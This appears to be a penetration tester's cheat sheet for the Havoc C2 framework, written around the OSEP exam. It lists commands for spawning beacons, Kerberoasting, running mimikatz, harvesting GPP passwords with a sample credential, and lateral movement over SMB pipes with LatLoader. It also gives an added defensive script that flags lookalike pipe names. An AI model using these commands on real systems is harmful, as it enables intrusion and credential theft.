Note
C5Spider (the author) is currently doing a rewrite of Havoc which will most likely improve its capabilities and stability. See the Havoc repo's rewrite branch for more details.
Havoc is still a new C2 framework and has some limitations: things it cannot do and things that may break. Also, the Havoc client can be a little resource-hungry. During the OSEP exam, my VM crashed a few times because of it, or the Havoc client process was killed. I also had computer crashes, but that is most likely a combination of this and Offsec's proctoring extension.
Commands
# https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD#commands
# ~~~ Non-exhaustive list below ~~~
# fork and run. Nice to start a second beacon in case the first one dies
shellcode spawn x64 /payloads/demon.x64.bin
# ADCS
adcs_enum
# Kerberoasting
get-spns
kerberoast <spn>
# run PE inline (exe) - builtin to Havoc - https://github.com/fortra/No-Consolation
noconsolation /tools/mimikatz/x64/mimikatz.exe "klist exit"
# dotnet inline execute
dotnet inline-execute "/tools/SharpCollection/NetFramework_4.7_Any/SharpView.exe" Find-LocalAdminAccess
# Socks Proxy
socks add 4242
# don't forget to edit your /etc/proxychains4.conf
proxychains4 netexec smb dc01.pinecorp.local -u deamian -p Winter2000 -M gpp_autologin -M gpp_password
# port forwarding (useful to forward a web server or similar)
# watch out for firewall settings on the beacon's host
rportfwd ....
# enum local sessions
enumlocalsessions
sessions
quser
schtaskenum
netview
klist
# dir remote share and cat content of file
dir "\\dc01.pinecorp.local\SYSVOL"
cat "\\dc01.pinecorp.local\SYSVOL\pinecorp.local/Policies/{EA980932-BE55-11EF-B70F-579199F31135}/Machine/Preferences/Registry/Registry.xml"
# lateral movement
# requires LatLoader bof: https://github.com/icyguider/LatLoader
# trkwks4185 is the name of your pipe as defined in your SMB listener config
LatLoader xorload dev01.pinecorp.local /payloads/smb.x64.bin
pivot connect dev01.pinecorp.local trkwks4185
Modules
LatLoader (Lateral Movement)
- LatLoader | LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework.
# lateral movement
LatLoader xorload dev01.pinecorp.local /payloads/smb.x64.bin
# don't forget to connect to the host if you used an SMB beacon
pivot connect dev01.pinecorp.local trkwks4185
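On the defensive side, the pipe name used for the SMB pivot in the Commands and LatLoader sections above (trkwks4185) is a known Windows service pipe name (trkwks, the Distributed Link Tracking Client) with a numeric suffix. The following added example is not part of the original notes: it classifies Sysmon-style pipe events (Event ID 17 Pipe Created / 18 Pipe Connected; the records and the allowlist are constructed) and flags pipe names that are a known service pipe plus digits.

```python
import re

# Constructed records in the shape of Sysmon Event ID 17/18 pipe events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\trkwks"},
    {"EventID": 17, "Image": r"C:\Windows\System32\lsass.exe", "PipeName": r"\lsass"},
    {"EventID": 17, "Image": r"C:\Users\Public\update.exe", "PipeName": r"\trkwks4185"},
    {"EventID": 18, "Image": r"C:\Windows\explorer.exe", "PipeName": r"\trkwks4185"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "PipeName": ""},
]

# Constructed allowlist of pipe names created by well-known Windows services; extend per environment.
KNOWN_PIPES = {"trkwks", "lsass", "srvsvc", "wkssvc", "spoolss", "netlogon", "samr", "epmapper"}

# A known pipe name immediately followed by two or more digits (e.g. trkwks4185).
LOOKALIKE = re.compile(r"^(?P<base>[a-z]+)(?P<suffix>\d{2,})$", re.IGNORECASE)


def classify_pipe(pipe_name: str) -> str:
    """Return 'known', 'lookalike' (known name + digits) or 'unknown' for a pipe name."""
    base = pipe_name.lstrip("\\").lower()
    if base in KNOWN_PIPES:
        return "known"
    match = LOOKALIKE.match(base)
    if match and match.group("base") in KNOWN_PIPES:
        return "lookalike"
    return "unknown"


def suspicious_pipe_events(events):
    """Keep pipe events (EID 17/18) whose pipe name is not on the allowlist."""
    findings = []
    for event in events:
        if event.get("EventID") not in (17, 18):
            continue  # not a pipe event
        verdict = classify_pipe(event["PipeName"])
        if verdict != "known":
            findings.append((event["EventID"], event["Image"], event["PipeName"], verdict))
    return findings


if __name__ == "__main__":
    for finding in suspicious_pipe_events(SAMPLE_EVENTS):
        print(finding)
```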
Shhhhloader (Obfuscated Dropper)
- Shhhhloader | Syscall Shellcode Loader
A decent obfuscation tool. However, it can sometimes break because of obscure Havoc profile configurations.
Use the GUI button in the navbar to generate your payload.
Warning
The tool currently doesn’t support grabbing the payloads from the listeners directly. You have to generate them prior and upload them via the file input in the GUI.
UAC-BOF-Bonanza (UAC Bypass BOF)
Tbd
Untested, but looks interesting.
HighBorn (UAC Bypass BOF)
Tbd
Untested, but looks interesting.
Pre-compiled binaries
# run PE inline (non C# exe)
noconsolation /tools/mimikatz/x64/mimikatz.exe "klist exit"
# dotnet inline execute (C# exe)
dotnet inline-execute "/tools/SharpCollection/NetFramework_4.7_Any/SharpView.exe" Find-LocalAdminAccess
Dotnet C# binaries:
- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
- https://github.com/Flangvik/SharpCollection
Havoc Profiles
Warning
I've had issues with listeners not working properly and not binding correctly. I recommend adding the listeners to your profile directly, and if you have to modify or update one, do it from the profile config file and restart the server. (You will not lose your data, but beacons might die if you change the communication protocols, ports, etc.)
python3 havoc_profile_generator.py
Limitations
Havoc doesn't support import-powershell, so you need to import the module yourself when running a PowerShell command:
powershell import-module C:\windows\tasks\somemodule.ps1; Invoke-ModuleCMD
Ref: https://github.com/HavocFramework/Havoc/issues/492#issuecomment-2198213157